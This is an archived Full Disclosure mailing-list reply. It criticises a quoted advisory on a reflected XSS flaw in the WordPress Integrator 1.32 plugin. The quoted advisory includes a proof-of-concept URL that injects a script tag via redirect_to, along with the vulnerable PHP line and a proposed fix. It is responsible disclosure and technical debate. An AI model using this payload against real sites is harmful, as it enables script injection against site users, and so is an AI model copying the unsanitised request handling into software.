Full Disclosure mailing list archives

Re: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability

From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 27 Mar 2012 14:55:13 +0200

Uhm...what?


A "security researcher" should know better how to write code.

In this case, where the input is perfectly valid (without requiring any
validation),
it is obvious that such encoding/conversion should be done on output, not
on input.


Chris.




On Tue, Mar 27, 2012 at 2:50 PM, Stefan Schurtz <sschurtz () t-online de>wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory ID: SSCHADV2012-010
Author: Stefan Schurtz
Affected Software: Successfully tested on WordPress Integrator 1.32
Vendor URL: http://wordpress.org/extend/plugins/wp-integrator/
Vendor Status: informed

==========================
Vulnerability Description
==========================

The WordPress plugin 'WordPress Integrator' is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://target/wordpress/wp-login.php?redirect_to=http://%3F1
<ScrIpT>alert(666)</ScrIpT>

// vulnerable code in wp-integrator.php

function init_handler() {
               $url = parse_url($_SERVER["REQUEST_URI"]);

=========
Solution
=========

function init_handler() {
               $url = parse_url(htmlentities($_SERVER["REQUEST_URI"]));

====================
Disclosure Timeline
====================

19-Mar-2012 - vendor informed
20-Mar-2012 - vendor informed (plugins () wordpress org)

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de

iEYEARECAAYFAk9xt3oACgkQg3svV2LcbMCoFQCdEqaArwVj3iuuCAqtljPkVGXS
1xgAn0ItuQyF6kMKxf0DQi1ppNWrHG9E
=0eCo
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability Stefan Schurtz (Mar 27)
- Re: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability Christian Sciberras (Mar 27)